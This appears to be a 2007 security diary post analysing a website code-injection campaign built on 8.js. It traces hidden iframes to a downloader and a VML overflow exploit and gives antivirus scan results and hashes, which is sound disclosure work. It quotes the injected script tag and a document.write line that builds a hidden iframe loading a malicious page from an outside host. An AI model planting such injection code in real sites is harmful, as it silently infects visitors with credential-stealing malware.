more code injection sites 8.js

Published: 2007-02-06
Last Updated: 2007-02-06 22:55:53 UTC
by donald smith (Version: 1)
0 comment(s)
We have discovered more defacements / code-injection similar to the superbowl site defacement.
If you google for script 8.js you will find that 1.js and 3 .js were not the only java script’s used in this fashion. This version appears to have been targeted a bit at gaming sites although there is a few medical sites including an “anonymous expert HIV/AIDS counseling” site with this defacement.

Why am I calling this a defacement?
Because that is what we called it in the past when a bad guy gained access to portions of a website and replaced or added their own content to the website. The concept of a website having additional content or having portions of the content replaced was usually looked at as embarrassing but not a major threat. In my opinion with the recent trend to perform “silent defacements” with malicious code injection, world writable content areas should be treated as a threat.

The only malicious version of 8.js I have seen so far is hosted on www.001yl.com

<skript scr=hxxp://www.001yl.c0m/8.js></skript>

The stuff I pulled from www.001y.com is very similar to the 3.js defacement we discussed in the dolphinstadium site write-ups.

8.js uses a hidden iframe to hide its reference to qq.htm
document.write('<iframe src="hxxp://www.zj5173.com/qq.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');

qq.htm uses several hidden iframes to call happy1.htm, happy2.htm, happy3.htm from www.001yl.com , h.js from www.zj5173.com and a counter at s102.cnzz.com.

Each happy1.htm (and 2 and 3) had pointers to http://www.zj5173.com/2.exe

h.js injects http://www.zj5173.com/3.js into a cookie.
3.js uses another hidden iframe to call hxxp://www.zj5173.com/1.htm
1.htm uses a VML overflow from www.hackwm.com to run some shell code.


2.exe is not currently well detected the virus scanning engines at virus total:

VIRUS TOTAL
Antivirus Version Update Result
AntiVir 7.3.1.34 02.06.2007 TR/PSW.16132
Authentium 4.93.8 02.06.2007 W32/Downloader.gen10
Avast 4.7.936.0 02.05.2007 no virus found
AVG 386 02.05.2007 no virus found
BitDefender 7.2 02.05.2007 DeepScan:Generic.PWS.WoW.911CB0F4
CAT-QuickHeal 9.00 02.05.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.05.2007 no virus found
DrWeb 4.33 02.05.2007 no virus found
eSafe 7.0.14.0 02.05.2007 suspicious Trojan/Worm
eTrust-InoculateIT 30.4.3371 02.05.2007 no virus found
eTrust-Vet 30.4.3371 02.05.2007 Win32/Gumbsumb!generic
Ewido 4.0 02.05.2007 no virus found
Fortinet 2.85.0.0 02.06.2007 no virus found
F-Prot 4.2.1.29 02.05.2007 W32/Downloader.gen10
Ikarus T3.1.0.31 02.06.2007 Generic.PWS.WoW
Kaspersky 4.0.2.24 02.06.2007 no virus found
McAfee 4956 02.05.2007 no virus found
Microsoft 1.2101 02.06.2007 no virus found
NOD32v2 2039 02.06.2007 no virus found
Norman 5.80.02 02.05.2007 no virus found
Panda 9.0.0.4 02.06.2007 no virus found
Prevx1 V2 02.06.2007 no virus found
Sophos 4.13.0 02.05.2007 no virus found
Sunbelt 2.2.907.0 02.02.2007 VIPRE.Suspicious
Symantec 10 02.06.2007 no virus found
TheHacker 6.1.6.052 02.05.2007 no virus found
UNA 1.83 02.05.2007 no virus found
VBA32 3.11.2 02.05.2007 suspected of Malware.Agent.36 (paranoid heuristics)
VirusBuster 4.3.19:9 02.05.2007 no virus found

Aditional Information
File size: 16132 bytes
MD5: ab2528881a3107463e13322fa31ecc4c
SHA1: 0fa0b4469f7765112e167f07a61954aeec7b1373
packers: UPX
packers: UPX, BINARYRES, UPX
packers: UPX, embedded
Sunbelt info: VIPRE.Suspicious is a generic detection



A NORMAN run shows this binary does some very suspicious stuff to a system.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)

[ General information ]
* Decompressing UPX.
* Accesses executable file from resource section.
* Creating several executable files on hard-drive.
* File length: 16132 bytes.
* MD5 hash: ab2528881a3107463e13322fa31ecc4c.

[ Changes to filesystem ]
* Deletes file C:\WINDOWS\system32\bdscheca001.dll.
* Creates file C:\WINDOWS\system32\bdscheca001.dll.
* Deletes file C:\WINDOWS\system32\drivers\etc\Hosts.

[ Changes to system settings ]
* Creates WindowsHook monitoring messages activity.

[ Signature Scanning ]
* C:\WINDOWS\system32\bdscheca001.dll (11524 bytes) : no signature detection.

(C) 2004-2006 Norman ASA. All Rights Reserved.


1.htm appears to be a fairly well recognized Iframe exploit.
From virustotal:::

Antivirus Version Update Result
AntiVir 7.3.1.34 02.06.2007 JS/Dldr.Small.CR.2
Authentium 4.93.8 02.06.2007 HTML/IFrameBoF@expl
Avast 4.7.936.0 02.06.2007 no virus found
AVG 386 02.06.2007 no virus found
BitDefender 7.2 02.05.2007 Trojan.Downloader.JS.SetSlice.B
CAT-QuickHeal 9.00 02.06.2007 no virus found
ClamAV devel-20060426 02.06.2007 Exploit.HTML.IFrameBOF-4
DrWeb 4.33 02.06.2007 Trojan.DownLoader.18179
eSafe 7.0.14.0 02.06.2007 no virus found
eTrust-InoculateIT 30.4.3372 02.06.2007 no virus found
eTrust-Vet 30.4.3372 02.06.2007 JS/Veemyfull!exploit
Ewido 4.0 02.06.2007 Not-A-Virus.Exploit.HTML.IframeBof
Fortinet 2.85.0.0 02.06.2007 no virus found
F-Prot 4.2.1.29 02.06.2007 HTML/IFrameBoF@e
Ikarus T3.1.0.31 02.06.2007 Exploit.HTML.IframeBof
Kaspersky 4.0.2.24 02.06.2007 Exploit.HTML.IframeBof
McAfee 4957 02.06.2007 JS/Exploit-BO.gen
Microsoft 1.2101 02.06.2007 TrojanDownloader:JS/SetSlice
NOD32v2 2041 02.06.2007 no virus found
Norman 5.80.02 02.06.2007 no virus found
Panda 9.0.0.4 02.06.2007 no virus found

File size: 10776 bytes
MD5: a7219fc65ea45252850e483a109cf0b3
SHA1: 261bac500ceedbd360768a193daf55b6b199de04
Keywords:
0 comment(s)

Comments


Diary Archives